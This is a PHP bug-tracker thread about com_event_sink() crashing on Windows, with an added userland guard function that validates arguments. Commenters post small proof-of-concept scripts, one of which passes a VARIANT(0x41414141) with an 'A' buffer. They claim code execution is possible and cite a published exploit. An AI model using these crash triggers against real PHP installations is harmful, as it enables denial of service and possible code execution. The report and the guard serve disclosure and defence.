Edit report at https://bugs.php.net/bug.php?id=62474&edit=1
ID:                 62474
Comment by:         fb1h2s at gmail dot com
Reported by:        deadb17ch at gmail dot com
Summary:            com_event_sink crashes when closure object given as an argument
Status:             Open
Type:               Bug
Package:            COM related
Operating System:   Windows XP SP3
PHP Version:        5.4.4
Block user comment: N
Private report:     N

New Comment:

Oh yeah, my mistake, I was referring to the arg 1 crash; didn't see a bug ID open for that here though.

<?php
$buffer = str_repeat("A", 1000);
$vVar  = new VARIANT(0x41414141); // We control this
$vVar2 = new VARIANT(0x41414141);
//
com_event_sink($vVar, $vVar2, $buffer);
?>


Previous Comments:
------------------------------------------------------------------------
[2012-07-26 13:43:04] deadb17ch at gmail dot com

I know. I have sent an advisory about possible code execution in the com_event_sink() function using a VARIANT object to bugtraq some time ago (21 May):

http://cxsecurity.com/issue/WLB-2012050163
http://www.exploit-db.com/exploits/18910/

but this time it is about a bug in the second argument, not the first.

------------------------------------------------------------------------
[2012-07-26 13:32:17] fb1h2s at gmail dot com

It's possible to achieve code execution using this bug.

$_evil_object = new VARIANT(0x41414141);

------------------------------------------------------------------------
[2012-07-03 20:18:20] deadb17ch at gmail dot com

Description:
------------
com_event_sink() crashes when a closure object (anonymous function) is given as the second argument...

Test script:
---------------
<?php
$__evil = function() { };
com_event_sink(
    /* variant */ new Variant(),
    /* object */  $__evil, // oink!
    /* mixed */   array()
);
?>

Expected result:
----------------
nothing happens, or information about an error (or maybe an argument type mismatch) is reported

Actual result:
--------------
crash

eax=00000000 ebx=010328f0 ecx=00000000 edx=00000001 esi=0121e438 edi=00000000
eip=100f33c8 esp=00c0fa50 ebp=00000000 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\xampp\php\php5ts.dll -
php5ts!php_com_load_typelib_via_cache+0x118:
100f33c8 8b08            mov     ecx,dword ptr [eax]  ds:0023:00000000=????????

------------------------------------------------------------------------


--
Edit this bug report at https://bugs.php.net/bug.php?id=62474&edit=1
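A userland guard an application can place in front of com_event_sink() while running an unpatched com_dotnet build, added here as an example and not part of the bug report or of PHP itself. It rejects, with a catchable exception, the two argument shapes the thread describes (a bare VARIANT instead of a live com object as argument 1, a Closure as argument 2) before the call reaches the extension's typelib lookup that the crash dump shows dereferencing NULL. safe_com_event_sink and describe_arg are hypothetical names chosen for this example.

```php
<?php
// Added example (not from the bug report): validate arguments in PHP before
// they reach com_event_sink(), so malformed calls raise an exception instead
// of crashing inside php5ts.dll. Written for PHP 5.4, matching the report.

function describe_arg($value)
{
    return is_object($value) ? get_class($value) : gettype($value);
}

function safe_com_event_sink($comObject, $sinkObject, $sinkInterface = null)
{
    // Argument 1 must be a real COM object. In com_dotnet the com class
    // extends variant, so a plain VARIANT (e.g. new VARIANT(0x41414141))
    // fails this check while a genuine com instance passes it.
    if (!($comObject instanceof com)) {
        throw new InvalidArgumentException(
            'com_event_sink(): argument 1 must be a com object, '
            . describe_arg($comObject) . ' given');
    }
    // Argument 2 must be an ordinary object whose methods receive events.
    // A Closure is an object, but it is exactly the case the report crashes on.
    if (!is_object($sinkObject) || $sinkObject instanceof Closure) {
        throw new InvalidArgumentException(
            'com_event_sink(): argument 2 must be a non-Closure object, '
            . describe_arg($sinkObject) . ' given');
    }
    // Argument 3 is documented as a string (interface name) or an array;
    // anything else is refused rather than forwarded.
    if ($sinkInterface !== null && !is_string($sinkInterface) && !is_array($sinkInterface)) {
        throw new InvalidArgumentException(
            'com_event_sink(): argument 3 must be a string or array, '
            . describe_arg($sinkInterface) . ' given');
    }
    return $sinkInterface === null
        ? com_event_sink($comObject, $sinkObject)
        : com_event_sink($comObject, $sinkObject, $sinkInterface);
}

// The report's test script routed through the guard: it now throws on
// argument 1 (a VARIANT, not a com object) instead of reaching the extension.
try {
    safe_com_event_sink(new VARIANT(), function () {}, array());
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), PHP_EOL;
}
```

The guard only covers the argument shapes named in this thread; it requires the com_dotnet extension on Windows to run, and does not replace updating the extension once a fixed build is available.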